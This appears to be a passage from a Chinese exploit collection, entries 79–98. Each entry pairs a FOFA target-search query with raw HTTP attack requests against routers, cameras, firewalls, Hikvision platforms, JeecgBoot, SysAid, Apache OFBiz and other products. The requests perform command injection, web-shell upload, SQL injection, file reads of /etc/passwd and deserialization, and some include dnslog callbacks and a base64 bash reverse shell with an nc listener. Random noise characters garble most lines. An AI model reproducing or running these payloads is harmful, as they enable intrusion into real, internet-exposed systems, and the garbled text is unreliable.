a% v6 L! ^8 k4 u; H4 U
. g* |; r0 B! {; D79. BYTEVALUE 百为流控路由器远程命令执行, C3 X0 d) ]: ^6 e/ T6 D+ n
FOFA:BYTEVALUE 智能流控路由器* N7 e- H; w8 @. }0 T, M/ I
GET /goform/webRead/open/?path=|id HTTP/1.1 X M ^8 x( i9 `. g/ `8 Y- }
Host:IP) }. g, L4 u I1 S0 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.02 r# g P( ?3 f& }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 n, k$ A& C' J. D j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 B/ q+ U: O( A' h, I4 f% I
Accept-Encoding: gzip, deflate( A) r, q2 x* n3 s6 f# H3 ~
Connection: close
. v d2 Y$ L4 l0 |Upgrade-Insecure-Requests: 1
+ X" n" R1 o$ `; X6 B
; l+ f. i- D/ D$ E6 O/ m7 Q I8 L1 ]" l3 I: S# i$ Y/ V
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
1 h- T% F& T( P/ c( H; e; g% q( JFOFA:app="速达软件-公司产品"
3 ~4 Q( @- Z! j/ e) hPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1! c' `- |/ |8 J" j2 v
Host: x.x.x.x$ O: Z* v6 `% z) e2 m, |, d, r, l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( ?4 G& I/ z2 b W1 Z
Content-Length: 27
6 k9 }0 `: a# }7 O" f/ N" BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& Y9 t. ]* r! L# |; @! e
Accept-Encoding: gzip, deflate( o7 ^0 Z6 }2 H5 i* I) c( j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# k; G, H# @9 w3 I6 a9 [
Connection: close1 t, Y$ ?+ V& U: S) e
Content-Type: application/octet-stream2 p3 |7 f9 x3 i ~" L5 U) S* k
Upgrade-Insecure-Requests: 1
Y" u! [& ?5 D; y O7 Z" r6 c" T. Y6 s; {
<% out.print("oessqeonylzaf");%>
! e- U4 x( ?. f) b6 o4 N8 ~8 T% t& P- d$ C1 b
6 }9 z7 V% D! h5 x. l$ D' f! yGET /xykqmfxpoas.jsp HTTP/1.1. v$ q! d! s6 f N) V: ~
Host: x.x.x.x
1 a( K y) B; R- @7 ^( {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 [$ M* D" B9 @+ o+ z# T: R, y
Connection: close7 ^; ^/ i- _2 ^
Accept-Encoding: gzip4 Y: s6 l! K" _- Y/ a
# K- J- w7 |; X- \. ~3 g- A( Y+ \$ h9 s8 X
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露/ q6 [9 ~' C3 J5 D, f
FOFA:app="uniview-视频监控"# f# ?9 J! k. z+ j4 e
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.19 h) N T0 k* e6 g8 E2 I/ _
Host: x.x.x.x
/ G S3 P* x4 s. m( B, bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 i+ T. J. e; ~: v5 s3 \- M
Connection: close7 e+ U" z7 c- u& ~! u( \" s
Accept-Encoding: gzip
9 o0 t1 a8 V0 T/ H; d7 m& a% F6 u; w' Q' ]4 L- j# J
+ U, u8 _/ e0 U6 A m& M# S82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
[" L9 I, f5 ?4 `3 r% |* gFOFA:app="思福迪-LOGBASE"
2 J. E/ P3 }! `6 {POST /bhost/test_qrcode_b HTTP/1.11 T9 ?1 U3 [% B- i7 m
Host: BaseURL$ b6 d0 U. t# I d, r' J
User-Agent: Go-http-client/1.1# q' t! L* c# {& s( x/ L9 p$ B& P
Content-Length: 23
+ T% w/ I- J) q9 H7 @9 d* lAccept-Encoding: gzip
# r: @7 b+ c9 ^. w0 `& ~1 n( L" ]Connection: close
& {1 C Q6 J$ l* G0 ?$ ^3 @" QContent-Type: application/x-www-form-urlencoded- [# ~0 b5 q8 @/ O1 g5 g
Referer: BaseURL
+ p" X6 i7 E0 I F4 j( ?+ D4 ?3 X: X, U' m
z1=1&z2="|id;"&z3=bhost
% c. x: _. R; I6 o9 y9 b9 Q. d- ]; W' n1 M% r! C' P
C# M1 X( s* f' l
83. JeecgBoot testConnection 远程命令执行 {* y3 ^" W& k3 q- u i- d: t g
FOFA:title=="JeecgBoot 企业级低代码平台"
: r0 U3 [6 }0 v$ Q% a! ~# r$ j
5 E4 U3 w: _6 P# u( j" C
) U9 \" Z6 p" o5 [$ q' G+ u3 P8 d# yPOST /jmreport/testConnection HTTP/1.1" M" l3 L Z1 W) W
Host: x.x.x.x
# d/ i1 u) N$ M, zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) m; n4 u ~ m: h+ v
Connection: close! m2 m _. S2 x) {/ J0 U0 Y8 Z5 L
Content-Length: 88811 x9 H9 p5 h+ G% V+ t$ A d
Accept-Encoding: gzip
x2 h( Q/ r2 x1 i- _1 JCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"$ t7 Q1 m/ `" a2 ~* A+ k& \
Content-Type: application/json
6 X8 h0 X |7 }% n$ S
' A P5 v8 z2 o- L1 W2 ]PAYLOAD, S: c( b, U. ?! k" _
4 C9 |4 x9 F5 a
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入 ~/ _5 B0 l; Z }( u
FOFA:title=="JeecgBoot 企业级低代码平台"1 Q" B3 L# T8 K$ {* W
+ _7 n7 S! f+ d+ G( t8 H
/ o# _2 `1 H1 B; |6 C! v' x
4 B& @- u1 X3 S( M2 YPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1' r6 H4 v: o$ b" j3 e
Host: 192.168.40.130:8080
, `6 N3 `* i$ @5 N2 a' zUser-Agent: curl/7.88.1
' r' @3 [' V; f9 c" [( Z" i; WContent-Length: 156/ D" Y0 t, W! G0 V
Accept: */*
0 m- G3 `* [- w% e& Z) N/ k, e! j/ OConnection: close5 r$ l* P+ |4 K* M; n( |
Content-Type: application/json
7 x0 H" y$ M# fAccept-Encoding: gzip- T! l& E' J9 s. @4 V
0 d' t+ U; l( Y% `; ^% }- ^7 A
{) k" x. W9 j2 y" q1 z, o
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
k9 k/ b( N& }. {7 Y, b "type": "0"2 Z- u# ~) N2 E" c; E6 y9 p
}# v n* i6 u# u: s# B
+ w7 }& _2 | G$ Z9 E8 I+ Q/ }7 g6 l
6 k7 k" g$ J/ J4 ~
85. SysAid On-premise< 23.3.36远程代码执行
6 Z' D% s5 S8 c) K! f8 E. E6 J \CVE-2023-472460 q7 O! ]& C S1 C
FOFA:body="sysaid-logo-dark-green.png"
* @: y( B# l2 D REXP数据包如下,注入哥斯拉马" D; |* [" G4 d3 \
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
( l3 z1 a9 G {' @3 ~Host: x.x.x.x
* z/ |$ B7 L1 i H" O; ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; t2 M" ^/ `# e" X! k8 ]) k, V* J* @
Content-Type: application/octet-stream
! m: L4 i2 @/ N" P6 D) HAccept-Encoding: gzip
( U) Z6 C; Z# ~; n0 l/ [" X* z. F8 \$ G
PAYLOAD" A. ]0 f6 g$ e4 U% m1 g! X
3 x, x$ P4 I; R$ U+ {2 A8 C+ n回显URL:http://x.x.x.x/userfiles/index.jsp
# c: R, t6 Z* u$ k4 D6 j9 V2 ?: Y" c6 q6 e" b6 K7 l, O
86. 日本tosei自助洗衣机RCE
8 `! q$ T8 O! I3 ]" e% m _8 VFOFA:body="tosei_login_check.php"
/ q+ b' l% D b' D- ^POST /cgi-bin/network_test.php HTTP/1.1
) k( Q, w4 y: ]9 O) D" \Host: x.x.x.x3 J3 `) F! y) j/ K* ?' o2 z
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36# o, ~* g5 a# t/ U
Connection: close* f* [* h* C# V/ Y3 E# c- [( F7 c3 k3 D
Content-Length: 44! q) T8 W" u; K- Z% [8 q; a
Accept: */*+ `2 Y+ L/ F t! y
Accept-Encoding: gzip, d' p$ H1 E/ u# U
Accept-Language: en7 r" |0 H4 `% R, F, P
Content-Type: application/x-www-form-urlencoded( l% d# i* K2 ~) ]8 r! D0 W
( h7 w1 T1 Y0 X" T( }' \3 r9 \host=%0acat${IFS}/etc/passwd%0a&command=ping8 v: \' _! o4 l7 @7 H+ K
6 p6 y8 x3 T( |
+ N+ v6 _7 R% S+ V87. 安恒明御安全网关aaa_local_web_preview文件上传
$ O( [- o, u8 N8 W2 f+ y% @FOFA:title="明御安全网关"" Q* W; x/ X0 U5 D4 g& y# |
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1: ]* F& ~& c: g. ?. h0 _( L
Host: X.X.X.X) e1 d' @' `+ ?0 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 \) {7 `( T1 d& l
Connection: close
0 G3 s0 }! P2 }, BContent-Length: 198' y; R5 K: \: R0 C; _, W1 r
Accept-Encoding: gzip1 p/ q+ j+ ?$ t: K1 g/ D, I
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
: c, n) y, ^0 }. ?4 Q& \7 Z8 i' K% ?" i2 J) K$ U' s
--qqobiandqgawlxodfiisporjwravxtvd
; L% V& ~( k: E9 O) {6 x0 A+ M* p! fContent-Disposition: form-data; name="123"; filename="9B9Ccd.php", o; W6 Y9 o( P; n. ?. E1 m
Content-Type: text/plain
' j) Y$ h9 ^& a& V; p3 T2 o5 f* |9 K* A1 h- C. R/ s
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
' O6 s5 {, P0 S2 J0 m--qqobiandqgawlxodfiisporjwravxtvd--4 Y5 v4 U/ T& K3 x" ?; \
2 t4 v- ~0 W* [3 M( q2 p
0 h( D% o A0 n0 n3 Z( f( ]$ J/jfhatuwe.php+ d4 T& q7 v) O1 [' P; A8 @( c
0 O' l) X+ [- h `
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行0 W y+ L2 p# Q% O! J6 `, y
FOFA:title="明御安全网关"
( \$ T4 y9 i3 T" @0 [GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
) P8 v) a) F" t+ m3 wHost: x.x.x.xx.x.x.x' C- c2 z4 W/ D" T @5 }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 ~/ o, q- z: v& R% B6 ?; DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( n0 Q# r8 t/ @$ n- |: G; p
Accept-Encoding: gzip, deflate* |0 j9 j6 @* w: }. u; Y5 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 O6 E" i6 T* g8 W5 p GConnection: close
2 I8 s2 F7 x8 m ?; V" h5 I5 _; e. W( p! b/ b4 {
* X6 Z7 S2 Z5 l' y% _- T, D
/astdfkhl.php, Y2 v/ A# f5 j
9 E9 ~( q# M$ A n
89. 致远互联FE协作办公平台editflow_manager存在sql注入$ C. n1 M' V% P5 e$ ^$ R0 j
FOFA:title="FE协作办公平台" || body="li_plugins_download". `/ `7 v- q4 T, C
POST /sysform/003/editflow_manager.js%70 HTTP/1.1) ~" D; F; h {$ _- g4 A, t
Host: x.x.x.x
% o5 N s- k) f! ^1 }" N; YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 z, b( D0 P$ |$ |$ ~+ X2 m& g
Connection: close) u# L2 R8 M p. w c7 Z/ i
Content-Length: 414 _+ |" Y9 q" g& f
Content-Type: application/x-www-form-urlencoded3 U$ L; |' M% k$ N) t! ?
Accept-Encoding: gzip
! Z/ o! j c6 a+ j6 A
% F F0 g0 t' Roption=2&GUID=-1'+union+select+111*222--+
9 i+ m( y! G2 I) U1 N- n9 M
5 ?2 ^: v; f1 U% z3 J. E2 E+ }, r' \3 C, ?. {( N/ A5 l, R% O. E
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行" X$ i( }5 N, ~) ^7 z
FOFA:icon_hash="-1830859634"
( l# q6 b7 u# [1 x9 ePOST /php/ping.php HTTP/1.1
5 A3 g' f4 `( S1 \6 k( E+ K' `4 tHost: x.x.x.x" C( ]" d) x7 C$ }4 F" E# h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
4 M% c. L' R" }5 SContent-Length: 51! V) A- s' b, y/ f
Accept: application/json, text/javascript, */*; q=0.01
* M) R* G# e" E& m1 i# vAccept-Encoding: gzip, deflate y+ M( ^7 f( H. Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) O. q9 q% H& d5 `7 @9 @
Connection: close
0 q9 J* Q/ V I/ K @Content-Type: application/x-www-form-urlencoded
% f1 b& V- Q, U6 ?9 iX-Requested-With: XMLHttpRequest
i) O# {9 d3 A- t+ E
8 j8 q H: U4 y- O9 Djsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
# @& u6 A. h2 i7 m9 {( p* u3 G8 l! }- i
; w+ R- ?2 p7 U- z& n# u
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
. j, E* M- z+ DFOFA:title="综合安防管理平台"6 [" C$ w/ Q v
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
# w3 X7 C) Y: WHost: your-ip$ w# r; X- q) K0 z/ I4 `. v4 K4 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% N( D M4 y7 q4 B% i/ kAccept-Encoding: gzip, deflate
Y/ S% \9 B* {$ |3 ~8 |Accept: */*
! s5 L# D t, z% W9 I* |) r8 |0 [Connection: keep-alive8 p3 \+ G( ^/ U+ |# L
. ~! p7 B/ |0 ^. G/ w
9 u/ F# ?& G: T$ [: Q' g1 v1 P. j7 x
6 d- a" U' b$ \+ Q, Y( ^8 e) @92. 海康威视运行管理中心session命令执行
! s) n' w& z2 ]2 M- o0 ~( z8 G& gFastjson命令执行- @: H, m T4 F# V2 A- i5 C* e8 _
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
. F. F% }( S1 L9 `$ H3 dPOST /center/api/session HTTP/1.1
. C% C5 C& k- D7 u3 D. q2 o& {6 yHost:. q9 o* e5 N8 G- h4 A; |, H
Accept: application/json, text/plain, */*& m) X1 G- M' D5 P
Accept-Encoding: gzip, deflate
: a$ X7 r+ n1 w x3 K1 Y9 MX-Requested-With: XMLHttpRequest
& |% |5 m- J- R) | G. ^$ O YContent-Type: application/json;charset=UTF-8
E3 E. U/ g) @1 {& e3 J% aX-Language-Type: zh_CN
$ W* d1 N+ R& u T5 bTestcmd: echo test
( c5 T" P5 V* m& U3 a: j0 Q* }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36% G; m$ ~! G& C- I4 y) Z
Accept-Language: zh-CN,zh;q=0.9
1 A- p, B( ]# J7 z9 _Content-Length: 5778
% z2 \% _, A/ m: }4 ?$ {8 C
# a. p# L, {. q: mPAYLOAD
' Y5 p, X* L& u. x I
: F9 `- k% H7 i% O2 ?: H6 ]4 Z/ u, C
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传 ?* o9 s1 k5 p4 ~
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
# E- K$ \) A: A+ E8 A5 UPOST /?g=app_av_import_save HTTP/1.1" ?" b: @, g, g# ?3 _4 k! l5 E
Host: x.x.x.x
2 d9 T* _4 [) ?& ]& \Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx3 H4 c4 l/ X$ {6 t. X4 S, P
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 W1 G. ]4 b+ X6 O) }5 \% [( M( s
& ^& A' h& ]/ r2 h4 p------WebKitFormBoundarykcbkgdfx3 Q4 c" N' R0 a1 C# l: Q9 U7 K
Content-Disposition: form-data; name="MAX_FILE_SIZE"/ }0 ?# t$ ?- N+ I8 t
% ~% c7 W# d4 d3 I10000000
. y& b& u) @6 L------WebKitFormBoundarykcbkgdfx' x/ A" d: v1 i" j
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
' r& ]3 I- w b9 [) p5 l( kContent-Type: text/plain
4 W" ]0 f# g9 r" S4 W# E$ I: M7 z6 a7 p; |8 V, A
wagletqrkwrddkthtulxsqrphulnknxa
! ~. R8 P4 {; r; C k8 g9 ~+ u------WebKitFormBoundarykcbkgdfx2 o4 G4 r; C2 J9 a1 |6 S
Content-Disposition: form-data; name="submit_post"
, N( O# J9 s1 o4 u! t& G
- k" o! T, H- L* O8 ^obj_app_upfile' y! w; K/ s8 ?& v
------WebKitFormBoundarykcbkgdfx8 X \9 u! Y6 W( R# h# J% _8 `( S
Content-Disposition: form-data; name="__hash__"
+ O$ D7 [5 I# E
0 v; Z# }& f4 I" O3 f0b9d6b1ab7479ab69d9f71b05e0e9445
/ ^! ~7 d, N8 {0 X: m------WebKitFormBoundarykcbkgdfx--3 i# M& R9 E8 `
8 o8 }! ~0 s' z8 e: ~! O
; T4 a9 S9 c0 p! I& z
GET /attachements/xlskxknxa.txt HTTP/1.1
6 @' z; i) O1 P, H A1 W1 P+ tHost: xx.xx.xx.xx
8 V3 b8 t) e* FUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: P6 T% t8 s6 N/ O) q
$ `3 x$ |+ P: K3 M9 L+ Z, P
6 E6 r8 U& h/ [7 [94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传) N; `8 R8 P3 t
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
/ T$ I' Q1 v8 K% v2 G+ sPOST /?g=obj_area_import_save HTTP/1.1
- X- X' O# E0 F' GHost: x.x.x.x7 T& k7 M( w, k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
- r: B9 t* `4 \/ VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
3 r" f' }: i; y' [ J% m$ `0 S
5 H! E: k3 ]8 a4 Y------WebKitFormBoundarybqvzqvmt
' V: R9 m9 }- G5 `3 h9 L- ?Content-Disposition: form-data; name="MAX_FILE_SIZE"9 S2 h& a; W" ~5 _& B
4 C% {6 S* ]7 J9 s- y3 w) L. n8 w
10000000
2 ^7 }5 ~! ^5 N------WebKitFormBoundarybqvzqvmt4 t" ^, I2 g$ D: d& Q
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"# V; S7 t# O1 l0 }+ X* G3 ~( R8 D; _
Content-Type: text/plain
- K& [8 u/ s& W+ L2 `: V; Y- ^# ^, _
pxplitttsrjnyoafavcajwkvhxindhmu
3 ]9 d6 Q* @9 B0 D% X------WebKitFormBoundarybqvzqvmt
3 }6 T5 W% ~/ A$ [ N% hContent-Disposition: form-data; name="submit_post"+ A' r: F4 k3 \& n
4 C% I% p1 i8 c; I, m; z* E% sobj_app_upfile
8 C# [) v% B/ J% Q# ]7 |. v# i' ~------WebKitFormBoundarybqvzqvmt
/ W+ L$ d# G$ j; JContent-Disposition: form-data; name="__hash__"
: c) d! W. _. {, ^
" h2 n( m/ R$ n# t9 O ]/ O0b9d6b1ab7479ab69d9f71b05e0e94450 B& ]; v0 u1 T1 j& E! L
------WebKitFormBoundarybqvzqvmt--
' H0 k& `( |$ E+ f, u
: K: b- o8 a2 y) ~. c/ }' T6 }' o: R& F8 }( k- p7 z
5 D% j* _2 p: q. E: y8 h
GET /attachements/xlskxknxa.txt HTTP/1.1" ?# {/ Z, O, E K2 ~2 G
Host: xx.xx.xx.xx
6 Y I {7 r- f1 R4 T) k7 |User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 P8 ?% F# i* z- c: ~1 T" p. `4 F" J
$ {7 g' x6 |0 M' x, v! H! N5 M- g# x& k
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行5 p# W( B( F2 }- n! X
CVE-2023-490700 W9 R5 ^4 \. S* T+ M
FOFA:app="Apache_OFBiz"
% b# Y5 m' o+ N' T! u, t2 o7 e3 V, BPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1$ @3 F" [+ L$ Q: U/ O
Host: x.x.x.x# n. M! T8 A3 b e: {' I" ~) `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36. \, E- M y* b* J, n& E' O& w3 C: U
Connection: close
3 H% p" q0 E- `3 |; Q1 o8 K7 D+ QContent-Length: 889* `, N2 _; U+ O. j5 r: j
Content-Type: application/xml
' K; U \2 i; B; _) c. sAccept-Encoding: gzip
6 z3 j% q* G7 k& t/ q- S% J- ? k4 H" u9 ?
<?xml version="1.0"?>
# o& U& {9 m6 i, }+ O" N<methodCall>' V4 ~" h2 r" _
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName># Z Z: ] |6 i$ @ W& L
<params>
/ B5 |$ d6 \, U) ^! Q ] x" ] <param>
% v+ u* T) L: o) Z9 s! l <value>
3 _( O! J# I) s1 h4 G8 b' u <struct>
/ ^& i2 t( Y* o- ? <member># C, X1 N9 s0 f: [& X7 v
<name>test</name>6 @& f, K# e( s
<value>3 l5 @9 F. C m/ K$ r/ w# V8 E$ d
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
2 O* Y' o1 p( ?4 O* i8 \9 y </value>
( B) u+ u5 s# I) m8 B4 U. p </member>
+ [; p. G. J3 u' Y: d& O </struct>
/ i# t1 q3 j( r6 D' x, {! C# a3 t </value>
/ t7 D: T8 W, E' [% q9 ^! }0 m6 T </param>0 Z: J0 T) G% S; ^0 T3 C
</params>
1 k1 B6 u) k- t! a, a2 y* f</methodCall>9 k' h! w4 O1 E; r, J; {# x
( s; y9 D# L; n" I9 e. n
j. b8 a2 j- A# E: I用ysoserial生成payload7 U i" v1 F& N4 P
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
/ j! o, y8 q ^
. k7 K! V' l' b- i/ S5 p) K: ?. q
5 e# L$ R4 f& K将生成的payload替换到上面的POC+ h9 E, N* G3 h$ Z: A+ [5 F0 |
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
) q* N' U* s {* n. b7 Z0 V! l0 yHost: 192.168.40.130:8443/ h/ S- w4 O; W3 K8 O$ L& ]9 s2 ^1 i
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
" f+ L3 D5 ]4 j- j8 L8 t2 [( C4 m5 XConnection: close
8 G' F, T9 r! B3 c- W' N, o/ NContent-Length: 889
/ ?$ ]. X- n% @7 D& O0 BContent-Type: application/xml
$ U: S, O% j" J: U/ j: K7 b1 QAccept-Encoding: gzip
: f+ u3 s/ n! H7 @9 e% l( b& J9 h1 n; ]9 y( R4 }
PAYLOAD3 u; n9 |: `! @5 Q: I; a
# G, ?; ]4 X% a; a
96. Apache OFBiz 18.12.11 groovy 远程代码执行) r8 S! g# z+ @& ^! w5 J
FOFA:app="Apache_OFBiz"
M5 |9 \# u% @$ j$ FPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
, I5 H& c# M3 }% W# ^Host: localhost:84437 I7 o7 U8 M1 h- V+ A( b6 W+ B7 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0+ _8 o) g# X) [( |+ E; v0 K; S
Accept: */*
3 l" [1 E) f1 ~ l9 V8 \4 B0 xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 U& K$ M- p1 f0 BContent-Type: application/x-www-form-urlencoded7 N; d; I% Y) B( D) c
Content-Length: 554 T6 T0 _: A" e4 z* _0 G- ]
/ \0 x) [* h' XgroovyProgram=throw+new+Exception('id'.execute().text);
5 C6 |& h/ h! f5 p/ U6 V# v7 m4 u3 v) z" ~$ `: D0 A8 f
0 x' [4 J9 U4 m, o; d6 ?反弹shell
" F7 w# R- v w$ \在kali上启动一个监听* K, h6 }. m0 X' m
nc -lvp 77775 ]5 o* J* I. g/ L) B1 B; G0 K
- V3 C+ \2 j5 V% F$ g
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1' S) }' _6 q* P! |# S9 d
Host: 192.168.40.130:8443! w& x0 m9 e1 m! P2 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 O. x% }8 A- m( K
Accept: */*
5 H6 R7 K1 D/ yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
g! A r& i: ~; d CContent-Type: application/x-www-form-urlencoded3 x% o; ?) F- F" N" }4 g$ m: A
Content-Length: 71& H/ X& u `8 u- o$ E" A
: i7 \" g! z' N, ?
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
% o: B, M& V6 Z U
" S9 _. o9 m7 |/ L+ y; G97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行7 E1 l; j A Z T1 I
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
) I, {0 g# ~' XGET /passport/login/ HTTP/1.1
/ z! @9 Q+ E2 z# m- s) RHost: 192.168.40.130:8085
% ^( T' B; ^4 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 S& r$ G. ^- P% V8 Z7 m
Accept-Encoding: gzip8 G7 E! b) o: S( I) A
Connection: close
3 D( y" ~% x" L# _. J. h' H$ @Cookie: rememberMe=PAYLOAD8 u: u: {5 g! B* Q4 v0 R
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
$ S5 T$ n2 c+ a2 y; b& u& U7 [ W9 h7 L6 @
& o+ P& Q4 F: \: J$ p: a98. SpiderFlow爬虫平台远程命令执行
8 n" J" C" `- T9 XCVE-2024-0195: K# }; o, L# s* [1 e% x4 W
FOFA:app="SpiderFlow"
. n( P {3 l4 [2 @0 C% F# r4 APOST /function/save HTTP/1.1
9 D' [4 Y& ]! N' h/ K1 m2 PHost: 192.168.40.130:8088
- o) B. ^0 h% S+ \7 K% kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 `8 s+ V+ t& G9 s
Connection: close
9 k2 a& {! [4 jContent-Length: 121
2 u" V" ] F! }& ~. Z# v1 jAccept: */*
7 s) U/ E; `+ g+ }$ G3 H4 kAccept-Encoding: gzip, deflate) E8 e2 U/ l& _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) d& d' n: u) j; D
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
